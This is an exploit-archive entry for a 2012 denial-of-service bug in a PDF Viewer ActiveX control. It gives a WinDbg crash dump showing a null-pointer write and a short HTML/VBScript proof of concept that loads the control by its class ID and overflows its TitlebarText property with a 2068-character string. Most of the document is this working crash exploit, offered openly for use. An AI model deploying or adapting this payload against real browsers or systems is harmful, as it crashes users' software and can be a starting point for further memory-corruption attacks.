PDF Viewer Component - ActiveX Denial of Service

2012-02-05T00:00:00
ID EXPLOITPACK:513C45CC90FB0A8CCD14122108234503
Type exploitpack
Reporter Senator of Pirates
Modified 2012-02-05T00:00:00

Description

PDF Viewer Component - ActiveX Denial of Service

                                        
                                            Title : PDF Viewer Component ActiveX DoS
Auther : Senator of Pirates
E-Mail : Senator.of.Pirates.team@gmail.com
FaceBook : FaceBook.Com/SenatorofPirates
Software link : http://www.ocxt.com/download/PDFViewerSetup.exe
Date : 05/02/2012
Tested : Windows Xp SP3 EN

eax=00000000 ebx=00000001 ecx=01800990 edx=01800990 esi=10150cd0 edi=000c5f6c
eip=017a7a3e esp=0013c754 ebp=0013c758 iopl=0         nv up ei ng nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210282
017a7a3e c60000          mov     byte ptr [eax],0           ds:0023:00000000=??
0:000> d eax
00000000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000010  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000020  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000030  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000040  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000050  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000060  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000070  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
0:000> d ebx
00000001  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000011  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000021  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000031  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000041  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000051  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000061  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
00000071  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

<object classid='clsid:44A8091F-8F01-43B7-8CF7-4BBA71E61E04' id='target' />
<script language='vbscript'>

targetFile = "C:\Program Files\PDFViewer\pdfviewer.ocx"
prototype  = "Invoke_Unknown TitlebarText As String"
memberName = "TitlebarText"
progid     = "PDFViewerLib.PDFViewer"
argCount   = 1

arg1=String(2068, "A")

target.TitlebarText = arg1

</script>